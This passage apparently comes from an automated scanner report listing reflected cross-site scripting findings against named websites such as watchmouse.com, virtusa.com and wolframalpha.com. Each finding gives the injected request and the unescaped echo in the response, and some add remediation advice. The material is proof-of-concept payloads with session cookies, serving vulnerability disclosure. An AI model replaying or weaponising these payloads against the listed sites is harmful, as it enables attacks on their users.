Host:   http://www.paperthin.com
Path:   /_cs_apps/ajaxProxy.cfm

Request

GET /_cs_apps/ajaxProxy.cfm?bean=twitterService&method=buildUtilityTweetHTML998c7<img%20src%3da%20onerror%3dalert(1)>36e6591e379&searchString=commonspot HTTP/1.1
Host: www.paperthin.com
Proxy-Connection: keep-alive
Referer: http://www.paperthin.com/products/pricing-options.cfm
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379.1298762761.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); sifrFetch=true; MTCCK=1; __utma=259978379.1159283661.1298762761.1298762761.1298762761.1; __utmc=259978379; __utmb=259978379.3.10.1298762761

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:16:36 GMT
Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13
Pragma: no-cache
Expires: {ts '2011-02-26 18:16:36'}
Content-Type: text/html; charset=UTF-8
Content-Length: 1638


           <script type="text/javascript" src="/ADF/thirdParty/jquery/jquery-1.3.2.js"></script>
           
           
   <!-- ADF Lightbox Framework Loaded @ {ts '2011-02-26 18:16:36'} -->
   <script type='text/javascript' s
...[SNIP]...
</script>
   The Bean: twitterService with method: buildUtilityTweetHTML998c7<img src=a onerror=alert(1)>36e6591e379 is not accessible remotely via Ajax Proxy.

3.185. http://www.prchecker.info/check_page_rank.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prchecker.info
Path:   /check_page_rank.php

Request

GET /check_page_rank.php/27f50"><script>alert(1)</script>1c5367c1276627aae?action=docheck&urlo=http%3A%2F%2Fcloudscan.us&submit=Check+PR HTTP/1.1
Host: www.prchecker.info
Proxy-Connection: keep-alive
Referer: http://www.prchecker.info/check_page_rank.php
Cache-Control: max-age=0
Origin: http://www.prchecker.info
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d8830cccd52d81fdcc1aa4a449836fbd

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 01:34:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<html>    
   <title>
...[SNIP]...
<form action="/check_page_rank.php/27f50"><script>alert(1)</script>1c5367c1276627aae" method="post">
...[SNIP]...

3.186. http://www.prchecker.info/check_page_rank.php [urlo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prchecker.info
Path:   /check_page_rank.php

Request

GET /check_page_rank.php?action=docheck&urlo=http%3A%2F%2Fcloudscan.us82917"%20style%3dx%3aexpression(alert(1))%20363f71d7529b64269&submit=Check+PR HTTP/1.1
Host: www.prchecker.info
Proxy-Connection: keep-alive
Referer: http://www.prchecker.info/check_page_rank.php
Cache-Control: max-age=0
Origin: http://www.prchecker.info
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d8830cccd52d81fdcc1aa4a449836fbd

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 01:34:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<html>    
   <title>
...[SNIP]...
<input type="text" value="http://cloudscan.us82917\" style=x:expression(alert(1)) 363f71d7529b64269" name="urlo" maxlength="200" class="McheckUrl MCmain">
...[SNIP]...

3.187. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-24/page-1/

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Portfolio/Trades-and-Exhibits/id-24c8e9b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1374672bac/page-1/ HTTP/1.1
Host: www.sti-cs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:18:55 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 14545

...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
<title>Trades and Exhibits :: STI - Creative Services</title>

<script type="text/javascript" language="javascript
...[SNIP]...
s.com/admin/imageproject/22940b.jpg';

           portfolio25[1][1]='Awards Logo design';

           portfolio25[1][2]='22940b.jpg';

           portfolio25[1][3]='229';

           portfolio25[1][4]='25';

           
var CurrentPageId='24c8e9b</script><script>alert(1)</script>a1374672bac';
</script>
...[SNIP]...

3.188. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-25/page-1/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-25/page-1/

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Portfolio/Trades-and-Exhibits/id-2598f92%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b72cc82878/page-1/ HTTP/1.1
Host: www.sti-cs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:19:02 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 14545

...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
<title>Trades and Exhibits :: STI - Creative Services</title>

<script type="text/javascript" language="javascript
...[SNIP]...
s.com/admin/imageproject/22940b.jpg';

           portfolio25[1][1]='Awards Logo design';

           portfolio25[1][2]='22940b.jpg';

           portfolio25[1][3]='229';

           portfolio25[1][4]='25';

           
var CurrentPageId='2598f92</script><script>alert(1)</script>4b72cc82878';
</script>
...[SNIP]...

3.189. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-7/page-1/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-7/page-1/

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Portfolio/Trades-and-Exhibits/id-74e625%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ccd8e3bb1d/page-1/ HTTP/1.1
Host: www.sti-cs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:18:51 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 14544

...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
<title>Trades and Exhibits :: STI - Creative Services</title>

<script type="text/javascript" language="javascript
...[SNIP]...
cs.com/admin/imageproject/22940b.jpg';

           portfolio25[1][1]='Awards Logo design';

           portfolio25[1][2]='22940b.jpg';

           portfolio25[1][3]='229';

           portfolio25[1][4]='25';

           
var CurrentPageId='74e625</script><script>alert(1)</script>7ccd8e3bb1d';
</script>
...[SNIP]...

3.190. http://www.virtusa.com/applications/userlogin/userlogin.asp [fn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /applications/userlogin/userlogin.asp

Request

GET /applications/userlogin/userlogin.asp?fn=practicebrochure/DWBIPR-PB-0410.pdfc59a7"><script>alert(1)</script>562a4528863&iframe HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2672
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:02:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<input type="hidden" name="fn" id="fn" value="practicebrochure/DWBIPR-PB-0410.pdfc59a7"><script>alert(1)</script>562a4528863" />
...[SNIP]...

3.191. http://www.virtusa.com/common/exitpage.asp [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /common/exitpage.asp

Request

GET /common/exitpage.asp?msgid=2&page=http%3A%2F%2Fwww%2Egartner%2Ecom%2Ftechnology%2Fsummits%2Femea%2Fbusiness%2Dprocess%2Findex%2Ejsp5b063"><script>alert(1)</script>97885e32c80 HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2085
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:02:11 GMT
Connection: close


<style>
body{
   padding:0;
   margin:0;
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   color: #333;
}
   
#contentarea{
   display:block;
   padding-top:10px;
}

#tbl{
   display
...[SNIP]...
<a href="http://www.gartner.com/technology/summits/emea/business-process/index.jsp5b063"><script>alert(1)</script>97885e32c80" target="_blank" onclick="$.fn.fancybox.close()">
...[SNIP]...

3.192. http://www.watchmouse.com/assets/css/print.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/print.css

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/css/print.css291e9'-alert(1)-'67bdd5c1b7a?20101008 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sun, 27 Feb 2011 01:37:31 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
ETag: "0-en-23e31667bc72ad97513a3b9a533cce89"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::http://www.watchmouse.com/en/::print.css291e9'-alert(1)-'67bdd5c1b7a?20101008');
           var serverRef = encodeURIComponent('http://www.watchmouse.com/en/');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
   
...[SNIP]...

3.193. http://www.watchmouse.com/assets/css/screen.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/screen.css

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/css/screen.css8adcd'-alert(1)-'6e92d57bec8?20101008 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sun, 27 Feb 2011 01:37:32 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
ETag: "0-en-b162fa23d063abe27d39c6c2ca59435b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::http://www.watchmouse.com/en/::screen.css8adcd'-alert(1)-'6e92d57bec8?20101008');
           var serverRef = encodeURIComponent('http://www.watchmouse.com/en/');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
   
...[SNIP]...

3.194. http://www.watchmouse.com/en/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en3c623'-alert(1)-'83954da49c1/ HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sun, 27 Feb 2011 01:36:45 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
ETag: "0-en-014c46aed482ac19cb678104562d803c"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::en3c623'-alert(1)-'83954da49c1');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsRef
...[SNIP]...

3.195. http://www.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/?41203'-alert(1)-'2f529518186=1 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 01:36:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
ETag: "0-en-fff3e345c354e49d8e0d897a110c3ceb"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 18498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::?41203'-alert(1)-'2f529518186=1');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsR
...[SNIP]...

3.196. http://www.watchmouse.com/en/api/checkreferrer.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/api/checkreferrer.php

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/api/checkreferrer.phpa0d30'-alert(1)-'ef346e3dbf0?vjsRef=&vref_string=173.193.214.243%3A%3A0%3A%3A%3A%3Aen&vserverRef= HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1298770635.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165779128.1798479609.1298770635.1298770635.1298770635.1; __utmc=165779128; __utmb=165779128.1.10.1298770635

Response

HTTP/1.1 404 Not Found
Date: Sun, 27 Feb 2011 01:37:20 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
ETag: "0-en-f7f299238f15fb232758e7723cf59eb8"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 14505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::http://www.watchmouse.com/en/::checkreferrer.phpa0d30'-alert(1)-'ef346e3dbf0?vjsRef=&vref_string=173.193.214.243%3A%3A0%3A%3A%3A%3Aen&vserverRef=');
           var serverRef = encodeURIComponent('http://www.watchmouse.com/en/');
           if(document && document.referrer){
               jsRef = encode
...[SNIP]...

3.197. http://www.winamp.com/media-player/en [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.winamp.com
Path:   /media-player/en

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /media-player/en5c2b5"%3b5abe0529ac9 HTTP/1.1
Host: www.winamp.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/login.php?do=login
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828671740-New%7C1361900671740%3B%20s_nrgvo%3DNew%7C1361900671741%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/media-player%252526ot%25253DA%3B; countryCookie=US

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:45:19 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 46245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
ryCode = "US";
var playerType = "";
var storeUrlGB = "http://shop.winamp.com/store/winamp/en_GB/buy/productID.103591500/quantity.1/ThemeID.1279300";
var storeBundleUrlGB = "null";
var urlLang = "en5c2b5";5abe0529ac9", osDectect = "Windows 7", dispLanguage = "en-us" , pageType = "", winampplayerFull = "http://download.nullsoft.com/winamp/client/winamp5601_full_emusic-7plus_", winampplayerLite = "http://download.nu
...[SNIP]...

3.198. http://www.wolframalpha.com/input/ [i parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolframalpha.com
Path:   /input/

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /input/?i=labor%20day610cb"-alert(1)-"0920c15034f HTTP/1.1
Host: www.wolframalpha.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=labor+day
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 02:00:30 GMT
Server: Apache-Coyote/1.1
X-UA-Compatible: chrome=1
Content-Type: text/html;charset=UTF-8
Set-Cookie: WR_SID=173.193.214.243.1298944830322764; path=/; max-age=315360000; domain=.wolframalpha.com
Set-Cookie: JSESSIONID=828A29FB0D81E34681FD534F67722D3B; Path=/
Content-Length: 24942

<!DOCTYPE html><html class="no-js"><head><title> labor day610cb&quot;-alert&#x28;1&#x29;-&quot;0920c15034f - Wolfram|Alpha</title><meta charset="utf-8" /><meta property="og:title" content="labor day61
...[SNIP]...
<![CDATA[ */

$(function(){


if("") {    
    recalculate("&i=labor%20day610cb"-alert(1)-"0920c15034f");
}

});
/* ]]>
...[SNIP]...

3.199. http://www.wolframalpha.com/input/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolframalpha.com
Path:   /input/

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /input/?i=labor%20day&76d96"-alert(1)-"0e67745c3bd=1 HTTP/1.1
Host: www.wolframalpha.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=labor+day
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 02:04:53 GMT
Server: Apache-Coyote/1.1
X-UA-Compatible: chrome=1
Content-Type: text/html;charset=UTF-8
Set-Cookie: WR_SID=173.193.214.243.1298945093061519; path=/; max-age=315360000; domain=.wolframalpha.com
Set-Cookie: JSESSIONID=3887B7536B35887892774ECD113FC0BA; Path=/
Content-Length: 36757

<!DOCTYPE html><html class="no-js"><head><title> labor day - Wolfram|Alpha</title><meta charset="utf-8" /><meta property="og:title" content="labor day - Wolfram|Alpha"/><meta name="description" conten
...[SNIP]...
